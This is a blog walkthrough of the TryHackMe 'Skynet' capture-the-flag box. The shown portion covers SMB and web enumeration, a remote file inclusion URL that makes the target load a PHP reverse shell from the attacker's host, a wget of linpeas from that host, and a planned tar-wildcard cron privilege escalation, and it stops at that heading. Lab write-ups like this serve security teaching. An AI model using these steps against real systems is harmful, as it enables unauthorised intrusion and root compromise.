02-01-2023, 01:03 AM
[TryHackMe] Skynet Walkthrough Using Remote File Inclusion
<div>
<div class="kk-star-ratings kksr-auto kksr-align-left kksr-valign-top" data-payload='{"align":"left","id":"1097569","slug":"default","valign":"top","ignore":"","reference":"auto","class":"","count":"1","legendonly":"","readonly":"","score":"5","starsonly":"","best":"5","gap":"5","greet":"Rate this post","legend":"5\/5 - (1 vote)","size":"24","width":"142.5","_legend":"{score}\/{best} - ({count} {votes})","font_factor":"1.25"}'>
<div class="kksr-stars">
<div class="kksr-stars-inactive">
<div class="kksr-star" data-star="1" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="2" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="3" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="4" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" data-star="5" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
<div class="kksr-stars-active" style="width: 142.5px;">
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
<div class="kksr-star" style="padding-right: 5px">
<div class="kksr-icon" style="width: 24px; height: 24px;"></div>
</p></div>
</p></div>
</div>
<div class="kksr-legend" style="font-size: 19.2px;"> 5/5 – (1 vote) </div>
</p></div>
<p class="has-global-color-8-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f510.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>How I used a remote file inclusion vulnerability to hack and root the Terminator’s computer</strong></p>
<figure class="wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube"><a href="https://blog.finxter.com/tryhackme-skynet-walkthrough-using-remote-file-inclusion/"><img src="https://blog.finxter.com/wp-content/plugins/wp-youtube-lyte/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FbKqwOXIMD4M%2Fhqdefault.jpg" alt="YouTube Video"></a><figcaption></figcaption></figure>
<h2>CHALLENGE OVERVIEW</h2>
<ul>
<li><strong>Link</strong>: <a href="https://tryhackme.com/room/skynet" target="_blank" rel="noreferrer noopener">https://tryhackme.com/room/skynet</a></li>
<li><strong>Difficulty</strong>: Easy</li>
<li><strong>Target</strong>: <code>user</code>/<code>root</code> flags</li>
<li><strong>Highlight</strong>: exploiting a remote file inclusion vulnerability to spawn a reverse shell</li>
<li><strong>Tools used</strong>: <code>smbclient</code>, <code>smbmap</code>, <code>gobuster</code>, <code>metasploit</code></li>
<li><strong>Tags</strong>: <em>gobuster, smb, rfi, squirrelmail</em></li>
</ul>
<h2>BACKGROUND</h2>
<p>In this walkthrough, we will root a terminator-themed capture-the-flag (CTF) challenge box.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="814" height="307" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-356.png" alt="" class="wp-image-1097574" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-356.png 814w, https://blog.finxter.com/wp-content/uplo...00x113.png 300w, https://blog.finxter.com/wp-content/uplo...68x290.png 768w" sizes="(max-width: 814px) 100vw, 814px" /></figure>
</div>
<h2><strong>IPs</strong></h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">export targetIP=10.10.144.117
export myIP=10.6.2.23</pre>
<h2>ENUMERATION</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">sudo nmap -p- -T5 -A -oN nmapscan.txt 10.10.144.117 -Pn</pre>
<h2>NMAP SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="601" height="589" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-364.png" alt="" class="wp-image-1097639" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-364.png 601w, https://blog.finxter.com/wp-content/uplo...00x294.png 300w" sizes="(max-width: 601px) 100vw, 601px" /></figure>
</div>
<pre class="wp-block-preformatted"><code>Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:33 EST
Stats: 0:00:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.10% done
Stats: 0:00:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.13% done; ETC: 18:35 (0:02:18 remaining)
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.35% done; ETC: 18:36 (0:02:46 remaining)
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 2.56% done; ETC: 18:36 (0:03:10 remaining)
Nmap scan report for 10.10.144.117
Host is up (0.084s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA PIPELINING UIDL TOP SASL AUTH-RESP-CODE
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 ID LOGIN-REFERRALS have LOGINDISABLEDA0001 capabilities more post-login ENABLE listed LITERAL+ Pre-login OK IDLE SASL-IR
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 5.4 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 3h27m51s, median: 4h59m59s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2023-01-24T04:40:37
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2023-01-23T22:40:36-06:00 TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 13.67 ms 10.6.0.1
2 ... 3
4 81.31 ms 10.10.144.117 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 443.46 seconds
</code></pre>
</p>
<h2>DIRB SCAN RESULTS</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="533" height="415" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-357.png" alt="" class="wp-image-1097578" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-357.png 533w, https://blog.finxter.com/wp-content/uplo...00x234.png 300w" sizes="(max-width: 533px) 100vw, 533px" /></figure>
</div>
<p>The <code>SquirrelMail</code> directory looks interesting. We’ll check that out in a minute.</p>
<h2>ENUMERATE THE SMB SHARE WITH NMAP SCAN</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="594" height="587" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-365.png" alt="" class="wp-image-1097640" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-365.png 594w, https://blog.finxter.com/wp-content/uplo...00x296.png 300w" sizes="(max-width: 594px) 100vw, 594px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">nmap --script smb-enum-shares -p 139 10.10.144.117</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code>Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 18:56 EST
Nmap scan report for 10.10.144.117
Host is up (0.086s latency). PORT STATE SERVICE
139/tcp open netbios-ssn Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.144.117\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (skynet server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\anonymous:
| Type: STYPE_DISKTREE
| Comment: Skynet Anonymous Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\srv\samba
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.144.117\milesdyson:
| Type: STYPE_DISKTREE
| Comment: Miles Dyson Personal Share
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\milesdyson\share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.144.117\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
smbmap -H 10.10.144.117
[+] Guest session IP: 10.10.144.117:445 Name: 10.10.144.117 Disk Permissions Comment ---- ----------- ------- print$ NO ACCESS Printer Drivers anonymous READ ONLY Skynet Anonymous Share milesdyson NO ACCESS Miles Dyson Personal Share IPC$ NO ACCESS IPC Service (skynet server (Samba, Ubuntu))
</code></pre>
</p>
<h2>LOGIN TO SAMBA SHARES AS ANONYMOUS</h2>
<pre class="wp-block-preformatted"><code>smbclient //10.10.144.117/anonymous
Password for [WORKGROUP\kalisurfer]:
Try "help" to get a list of possible commands.
smb: \> ls . D 0 Thu Nov 26 11:04:00 2020 .. D 0 Tue Sep 17 03:20:17 2019 attention.txt N 163 Tue Sep 17 23:04:59 2019 logs D 0 Wed Sep 18 00:42:16 2019 grab the log1.txt (a password list)
milesdyson (username)
</code></pre>
<h2>WALK THE WEBSITE</h2>
<p>We discovered a login portal for <code>squirrelmail</code> from the <code>dirb</code> scan. Let’s check it out now in our browser.</p>
<pre class="wp-block-preformatted"><code>http://10.10.144.117/squirrelmail</code></pre>
<p>Loading the site reveals a version number. A quick search points to a local file inclusion vulnerability.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">SquirrelMail version 1.4.23 [SVN]
Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
</pre>
<h2>ENUMERATING THE SMB SHARE</h2>
<p>The first password from the <code>log1.txt</code> file from the <code>smb</code> share on the list works! We are in milesdyson’s email account now and see two interesting emails.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">serenakogan@skynet 01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 skynet@skynet
new smb password: )s{A&2Z=F^n_E.B`
</pre>
<h2>LOGIN TO SMB SHARE AS milesdyson</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="1" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">smbclient //$targetIP/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls . D 0 Tue Sep 17 05:05:47 2019 .. D 0 Tue Sep 17 23:51:03 2019 Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 05:05:14 2019 Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 05:05:14 2019 Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 05:05:14 2019 notes D 0 Tue Sep 17 05:18:40 2019 Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 05:05:14 2019 Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 05:05:14 2019 9204224 blocks of size 1024. 5831424 blocks available
</pre>
<p>Let’s grab the <code>important.txt</code> file:</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">get important.txt</pre>
<p>Reading through the contents, we are pointed toward a hidden beta cms directory</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">/45kra24zxs28v3yd</pre>
<h2>GOBUSTER FOR DIRECTORY SNIFFING</h2>
<p>We’ll further enumerate the hidden beta cms directory now with gobuster.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">gobuster dir -uhttp://10.10.221.72/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirb/common.txt
</pre>
<pre class="wp-block-preformatted"><code>===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.169.173/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2023/01/24 09:52:22 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 278]
/.htaccess (Status: 403) [Size: 278]
/.htpasswd (Status: 403) [Size: 278]
/administrator (Status: 301) [Size: 339] [--> http://10.10.169.173/45kra24zxs28v3yd/administrator/]
Progress: 337 / 4615 (7.30%) Progress: 397 / 4615 (8.60%) Progress: 456 / 4615 (9.88%) Progress: 507 / 4615 (10.99%) Progress: 558 / 4615 (12.09%) Progress: 618 / 4615 (13.39%) Progress: 674 / 4615 (14.60%) Progress: 728 / 4615 (15.77%) Progress: 788 / 4615 (17.07%) Progress: 845 / 4615 (18.31%) Progress: 898 / 4615 (19.46%) Progress: 956 / 4615 (20.72%) Progress: 1015 / 4615 (21.99%) Progress: 1072 / 4615 (23.23%) Progress: 1125 / 4615 (24.38%) Progress: 1185 / 4615 (25.68%) Progress: 1245 / 4615 (26.98%) Progress: 1299 / 4615 (28.15%) Progress: 1359 / 4615 (29.45%) Progress: 1419 / 4615 (30.75%) Progress: 1472 / 4615 (31.90%) Progress: 1532 / 4615 (33.20%) Progress: 1590 / 4615 (34.45%) Progress: 1640 / 4615 (35.54%) Progress: 1700 / 4615 (36.84%) Progress: 1750 / 4615 (37.92%) Progress: 1804 / 4615 (39.09%) Progress: 1864 / 4615 (40.39%) Progress: 1904 / 4615 (41.26%) Progress: 1964 / 4615 (42.56%) Progress: 2020 / 4615 (43.77%) /index.html (Status: 200) [Size: 418] Progress: 2063 / 4615 (44.70%) Progress: 2123 / 4615 (46.00%) Progress: 2173 / 4615 (47.09%) Progress: 2216 / 4615 (48.02%) Progress: 2273 / 4615 (49.25%) Progress: 2333 / 4615 (50.55%) Progress: 2383 / 4615 (51.64%) Progress: 2443 / 4615 (52.94%) Progress: 2503 / 4615 (54.24%) Progress: 2563 / 4615 (55.54%) Progress: 2618 / 4615 (56.73%) Progress: 2673 / 4615 (57.92%) Progress: 2733 / 4615 (59.22%) Progress: 2782 / 4615 (60.28%) Progress: 2842 / 4615 (61.58%) Progress: 2903 / 4615 (62.90%) Progress: 2962 / 4615 (64.18%) Progress: 3020 / 4615 (65.44%) Progress: 3075 / 4615 (66.63%) Progress: 3135 / 4615 (67.93%) Progress: 3194 / 4615 (69.21%) Progress: 3254 / 4615 (70.51%) Progress: 3305 / 4615 (71.61%) Progress: 3364 / 4615 (72.89%) Progress: 3424 / 4615 (74.19%) Progress: 3484 / 4615 (75.49%) Progress: 3544 / 4615 (76.79%) Progress: 3597 / 4615 (77.94%) Progress: 3655 / 4615 (79.20%) Progress: 3707 / 4615 (80.33%) Progress: 3767 / 4615 (81.63%) Progress: 3827 / 4615 (82.93%) Progress: 3887 / 4615 (84.23%) Progress: 3947 / 4615 (85.53%) Progress: 4001 / 4615 (86.70%) Progress: 4058 / 4615 (87.93%) Progress: 4115 / 4615 (89.17%) Progress: 4174 / 4615 (90.44%) Progress: 4234 / 4615 (91.74%) Progress: 4285 / 4615 (92.85%) Progress: 4338 / 4615 (94.00%) Progress: 4398 / 4615 (95.30%) Progress: 4458 / 4615 (96.60%) Progress: 4513 / 4615 (97.79%) Progress: 4570 / 4615 (99.02%) ===============================================================
2023/01/24 09:53:04 Finished
===============================================================</code>
</pre>
<h2>ADMINISTRATOR PORTAL DISCOVERED!</h2>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="596" height="591" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-366.png" alt="" class="wp-image-1097641" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-366.png 596w, https://blog.finxter.com/wp-content/uplo...00x297.png 300w, https://blog.finxter.com/wp-content/uplo...50x150.png 150w" sizes="(max-width: 596px) 100vw, 596px" /></figure>
</div>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">http://10.10.169.173/45kra24zxs28v3yd/administrator/</pre>
<h2>IDENTIFY A KNOWN VULNERABILITY</h2>
<p>Looking up the service name shows us that there is a remote file inclusion vulnerability.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="769" height="456" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-358.png" alt="" class="wp-image-1097594" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-358.png 769w, https://blog.finxter.com/wp-content/uplo...00x178.png 300w" sizes="(max-width: 769px) 100vw, 769px" /></figure>
</div>
<h2>SPAWN A REVERSE SHELL WITH PHP PENTEST MONKEY AND REMOTE FILE INCLUSION</h2>
<p>After preparing a basic php revshell, serving it with a simple HTTP server, we now go to our browser and load the address:</p>
<p><a href="http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php" target="_blank" rel="noreferrer noopener">http://10.10.221.72/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://$myIP:8000/payload.php</a></p>
<h2>STABILIZE THE SHELL</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">python -c 'import pty;pty.spawn("/bin/bash")';</pre>
<h2>ENUMERATE WITH LINPEAS</h2>
<p>After downloading <code>linpeas.sh</code> and serving it with the simple HTTP server, we can copy it over to our target machine’s <code>/tmp</code> folder with <code>wget http://$myIP:port/linpeas.sh</code>.</p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">$ ./linpeas.sh</pre>
<pre class="wp-block-preformatted"><code> ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀ ▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀ ▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀ /---------------------------------------------------------------------------------\ | Do you like PEASS? | |---------------------------------------------------------------------------------| | Get the latest version : https://github.com/sponsors/carlospolop | | Follow on Twitter : @carlospolopm | | Respect on HTB : SirBroccoli | |---------------------------------------------------------------------------------| | Thank you! | \---------------------------------------------------------------------------------/ linpeas-ng by carlospolop
</code></pre>
<p class="has-global-color-8-background-color has-background"><img src="https://s.w.org/images/core/emoji/14.0.0/72x72/1f510.png" alt="?" class="wp-smiley" style="height: 1em; max-height: 1em;" /> <strong>ADVISORY</strong>: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it on your own computers and/or with the computer owner’s permission.</p>
<p>Linux Privesc Checklist: <a href="https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist" target="_blank" rel="noreferrer noopener">https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist</a></p>
<pre class="wp-block-preformatted"><code>LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username Starting linpeas. Caching Writable Folders... ╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝
OS: Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
User & Groups: uid=33(www-data) gid=33(www-data) groups=33(www-data)
Hostname: skynet
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h) Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-harden...l-exploits
Linux version 4.8.0-58-generic (buildd@lgw01-21) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017
Distributor ID: Ubuntu
Description: Ubuntu 16.04.6 LTS
Release: 16.04
Codename: xenial ╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-harden...do-version
Sudo version 1.8.16 ╔══════════╣ CVEs Check
Vulnerable to CVE-2021-4034 Potentially Vulnerable to CVE-2022-2588 ---abbreviated ---
THE MOST RELEVANT INFO FROM LINPEAS in bold:
VULNERABLE TO CVE-2021-4034
MAYBE CVE-2022-2588 https://github.com/carlospolop/PEASS-ng/...linpeas.sh
[+] [CVE-2017-16995] eBPF_verifier Details: https://ricklarabee.blogspot.com/2018/07...linux.html Exposure: highly probable Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},[ ubuntu=(16.04|17.04) ]{kernel:4.(8|10).0-(19|28|45)-generic} Download URL: https://www.exploit-db.com/download/45010 Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
</code></pre>
<h2>FURTHER ENUMERATION</h2>
<p>Let’s probe a bit more into this machine for some of the common Linux privilege escalation pathways.</p>
<p><strong>CHECK CRONJOBS</strong></p>
<pre class="EnlighterJSRAW" data-enlighter-language="generic" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">cat /etc/crontab</pre>
<p>Output:</p>
<pre class="wp-block-preformatted"><code># m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
</code></pre>
</p>
<p>The first job in the list is set to run every minute and it just executes <code>backup.sh</code>. Let’s find out what that file does.</p>
<div class="wp-block-image">
<figure class="aligncenter size-full"><img decoding="async" loading="lazy" width="461" height="312" src="https://blog.finxter.com/wp-content/uploads/2023/01/image-359.png" alt="" class="wp-image-1097606" srcset="https://blog.finxter.com/wp-content/uploads/2023/01/image-359.png 461w, https://blog.finxter.com/wp-content/uplo...00x203.png 300w" sizes="(max-width: 461px) 100vw, 461px" /></figure>
</div>
<p>We can see that <code>backup.sh</code> starts a new shell, changes directory to <code>/var/www/html</code> and then creates a tarball file of all the files from <code>/var/www/html</code> and stores it in <code>home/milesdyson/backups/backup.tgz</code></p>
<p>The <code>*</code> is a wildcard symbol that means everything in the current directory. We can exploit this by adding our own files and using file names with unusual extensions to launch a malicious file, <code>magic.sh</code> as part of the automated cronjob that runs <code>backup.sh</code> and creates a tarball every minute of the contents of the directory.</p>
<h2>PLAN AND CARRY OUT PRIVILEGE ESCALATION</h2>
